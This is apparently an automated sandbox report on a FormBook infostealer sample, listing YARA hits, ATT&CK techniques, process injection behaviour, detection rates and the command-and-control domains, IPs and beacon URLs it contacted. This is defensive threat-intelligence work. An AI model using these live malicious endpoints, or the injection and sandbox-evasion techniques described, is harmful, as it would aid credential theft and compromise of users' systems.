          Source: Yara matchFile source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery131Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 433078 Sample: KY4cmAI0jU.exe Startdate: 11/06/2021 Architecture: WINDOWS Score: 100 31 www.sciencebasedmasks.com 2->31 33 www.baliholisticacademy.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 4 other signatures 2->47 11 KY4cmAI0jU.exe 20 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\System.dll, PE32 11->29 dropped 57 Detected unpacking (changes PE section rights) 11->57 59 Maps a DLL or memory area into another process 11->59 61 Tries to detect virtualization through RDTSC time measurements 11->61 15 KY4cmAI0jU.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 Queues an APC in another process (thread injection) 15->69 18 explorer.exe 15->18 injected process9 dnsIp10 35 www.meganfantastic.com 45.195.169.197, 49750, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 18->35 37 www.ladorreguita.com 173.234.255.253, 49737, 80 LEASEWEB-USA-LAX-11US United States 18->37 39 11 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 22 help.exe 18->22         started        signatures11 process12 signatures13 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          KY4cmAI0jU.exe35%VirustotalBrowse
          KY4cmAI0jU.exe23%MetadefenderBrowse
          KY4cmAI0jU.exe41%ReversingLabsWin32.Backdoor.Mokes
          KY4cmAI0jU.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nssF140.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.2.help.exe.3407960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.KY4cmAI0jU.exe.2170000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.KY4cmAI0jU.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.1.KY4cmAI0jU.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.KY4cmAI0jU.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.help.exe.9fd7e8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.0.KY4cmAI0jU.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File
          1.0.KY4cmAI0jU.exe.400000.0.unpack100%AviraHEUR/AGEN.1137482Download File

          Domains

          SourceDetectionScannerLabelLink
          www.rentcafecloudflaremvccn.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.dndemystified.com/sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.meganfantastic.com/sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.starflexacademy.com/sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.insurancedowntown.com/sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.ladorreguita.com/sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          www.alberthospice.com/sh2m/0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.candydulce.com/sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.ezonkorea.com/sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe
          http://www.take-me-bergen.com/sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
          		3.143.65.214
          		truefalse
            		high
            www.baliholisticacademy.com
            		192.185.0.218
            		truefalse
              		unknown
              www.take-me-bergen.com
              		172.67.206.33
              		truetrue
                		unknown
                www.meganfantastic.com
                		45.195.169.197
                		truetrue
                  		unknown
                  www.rentcafecloudflaremvccn.com
                  		104.18.193.20
                  		truetrueunknown
                  www.candydulce.com
                  		104.21.89.72
                  		truetrue
                    		unknown
                    www.ezonkorea.com
                    		3.34.12.41
                    		truetrue
                      		unknown
                      www.ladorreguita.com
                      		173.234.255.253
                      		truetrue
                        		unknown
                        dndemystified.com
                        		107.180.57.111
                        		truetrue
                          		unknown
                          www.starflexacademy.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.dndemystified.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.insurancedowntown.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.obi4ex.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.sciencebasedmasks.com
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.dndemystified.com/sh2m/?i0=e+6U2v/464/49Vrt/4yGVwpDKMjmMUzpCV508o5/z2Kz7+x90JHivdh29zvGxsTtrzAO&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.meganfantastic.com/sh2m/?i0=uHvpiI6aXo2y2Po+6svR0qIfr0jRx6IK9412etvelJearRBAFXnPloN9l4KAKLF+tazG&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.starflexacademy.com/sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.insurancedowntown.com/sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.ladorreguita.com/sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    www.alberthospice.com/sh2m/true
                                    • Avira URL Cloud: safe
                                    		low
                                    http://www.candydulce.com/sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.ezonkorea.com/sh2m/?i0=UiVwUNrNLQfwtohPmVYH70t5lUixURpqlrLqHTUDsyREBVD/9Tpqi3FDGPs9lJ3zNa3b&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.take-me-bergen.com/sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3Ltrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.fontbureau.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                            		high
                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.csshelp.exe, 00000006.00000002.482952749.0000000003582000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.tiro.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_ErrorErrorKY4cmAI0jU.exefalse
                                                    		high
                                                    http://www.goodfont.co.krexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.carterandcone.comlexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.typography.netDexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://fontfabrik.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://nsis.sf.net/NSIS_ErrorKY4cmAI0jU.exefalse
                                                          		high
                                                          http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.fonts.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.sandoll.co.krexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.sakkal.comexplorer.exe, 00000002.00000000.235828489.0000000008B46000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown

                                                              Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              104.21.89.72
                                                              		www.candydulce.comUnited States
                                                              		13335CLOUDFLARENETUStrue
                                                              104.18.193.20
                                                              		www.rentcafecloudflaremvccn.comUnited States
                                                              		13335CLOUDFLARENETUStrue
                                                              107.180.57.111
                                                              		dndemystified.comUnited States
                                                              		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                              173.234.255.253
                                                              		www.ladorreguita.comUnited States
                                                              		395954LEASEWEB-USA-LAX-11UStrue
                                                              172.67.206.33
                                                              		www.take-me-bergen.comUnited States
                                                              		13335CLOUDFLARENETUStrue
                                                              3.143.65.214
                                                              		prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comUnited States
                                                              		16509AMAZON-02USfalse
                                                              45.195.169.197
                                                              		www.meganfantastic.comSeychelles
                                                              		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                              3.34.12.41
                                                              		www.ezonkorea.comUnited States
                                                              		16509AMAZON-02UStrue

                                                              General Information

                                                              Joe Sandbox Version:32.0.0 Black Diamond
                                                              Analysis ID:433078
                                                              Start date:11.06.2021
                                                              Start time:09:00:39
                                                              Joe Sandbox Product:CloudBasic
                                                              Overall analysis duration:0h 9m 13s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:light
                                                              Sample file name:KY4cmAI0jU.exe
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of analysed new started processes analysed:28
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:1
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@7/4@13/8
                                                              EGA Information:Failed
                                                              HDC Information:
                                                              • Successful, ratio: 24.2% (good quality ratio 22%)
                                                              • Quality average: 75.2%
                                                              • Quality standard deviation: 30.5%
                                                              HCA Information:
                                                              • Successful, ratio: 90%
                                                              • Number of executed functions: 0
                                                              • Number of non-executed functions: 0
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .exe
                                                              Warnings:
                                                              Show All
                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                              • Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.193.48, 20.82.210.154, 23.218.208.56, 8.238.30.254, 8.238.85.126, 8.241.126.249, 8.238.28.254, 8.238.85.254, 92.122.213.194, 92.122.213.247, 20.50.102.62, 20.54.26.129, 92.122.145.220, 104.21.89.254, 172.67.150.126
                                                              • Excluded domains from analysis (whitelisted): www.sciencebasedmasks.com.cdn.cloudflare.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                                              • Not all processes where analyzed, report is missing behavior information

                                                              Simulations

                                                              Behavior and APIs

                                                              No simulations

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              3.143.65.214New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                              • www.honestfind.com/un8c/?m6=ttrozPO2fCY4HABnjt4KyaVHjwA7V0TtNu2qTCNkPssR21w9Sg0RX1LnPvL6CB+p5ZV1rRPS2w==&z8b=iZspkzE0JnS86
                                                              6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                              • www.painhut.com/p2io/?vPqT4=6lnLSRg0&G0Dp=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BUbJiBa321YLUv6f4A==
                                                              QyKNw7NioL.exeGet hashmaliciousBrowse
                                                              • www.painhut.com/p2io/?m4=PditjTvx4PwX_x-&aBd=403u/w6B7XptcAEzuvN4cykoFcXgffqxcXNiYWMFmnIxKaVZCbECctw1BUXJxRW0vlYd
                                                              Descripciones de oferta de productos MACIILIAS SRL doc.exeGet hashmaliciousBrowse
                                                              • www.ryanscode.com/ftgq/?FTChJZL=23JWsXMNU3B901upE30epEJ3klQjQSAbj7e94TDSIuOB/RvSwvTb1tco95KnMzdjPkxzNHr8OA==&vRiDu=khOtRFfxvlNlUv7
                                                              New order 301534.pdf.exeGet hashmaliciousBrowse
                                                              • www.infooro.com/sbqi/?ZjR=1b5JUoDV2ITPMK/1rKvz5BlJOGiJqGjXGFGHUzRwz75T2RYjCnVbOWbU3HBy3iWt/ycywG3p/A==&ndnddT=ot9xbpDpf8H4
                                                              45.195.169.197L2.xlsxGet hashmaliciousBrowse
                                                              • www.meganfantastic.com/sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                              prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comDNPr7t0GMY.exeGet hashmaliciousBrowse
                                                              • 13.59.53.244
                                                              SecuriteInfo.com.Trojan.Packed2.43183.29557.exeGet hashmaliciousBrowse
                                                              • 13.59.53.244
                                                              Letter 09JUN 2021.xlsxGet hashmaliciousBrowse
                                                              • 52.14.32.15
                                                              PO#78765439.ZIP.exeGet hashmaliciousBrowse
                                                              • 52.14.32.15
                                                              New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                              • 3.143.65.214
                                                              PROFORMA FATURA PDF.exeGet hashmaliciousBrowse
                                                              • 13.59.53.244
                                                              6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                              • 3.143.65.214
                                                              Telex_Payment.exeGet hashmaliciousBrowse
                                                              • 52.14.32.15
                                                              STATEMENT.exeGet hashmaliciousBrowse
                                                              • 13.59.53.244
                                                              QyKNw7NioL.exeGet hashmaliciousBrowse
                                                              • 3.143.65.214
                                                              SKMBT41085NC9.exeGet hashmaliciousBrowse
                                                              • 52.14.32.15
                                                              CC for account.exeGet hashmaliciousBrowse
                                                              • 13.59.53.244
                                                              CARGO ARRIVAL NOTICE-MEDICOM AWB.exeGet hashmaliciousBrowse
                                                              • 52.14.32.15
                                                              statement.exeGet hashmaliciousBrowse
                                                              • 52.14.32.15
                                                              CONTRACT SWIFT.exeGet hashmaliciousBrowse
                                                              • 52.14.32.15
                                                              RE; KOC RFQ for Flangers - RFQ 22965431.exeGet hashmaliciousBrowse
                                                              • 52.14.32.15
                                                              PO 0003789311.exeGet hashmaliciousBrowse
                                                              • 13.59.53.244
                                                              tgb4.exeGet hashmaliciousBrowse
                                                              • 13.59.53.244
                                                              transferencia bancaria.exeGet hashmaliciousBrowse
                                                              • 52.15.160.167
                                                              SHIPPING DOCUMENT_7048555233PDF.exeGet hashmaliciousBrowse
                                                              • 3.143.65.214
                                                              www.rentcafecloudflaremvccn.comdwg.exeGet hashmaliciousBrowse
                                                              • 104.18.194.20
                                                              www.meganfantastic.comL2.xlsxGet hashmaliciousBrowse
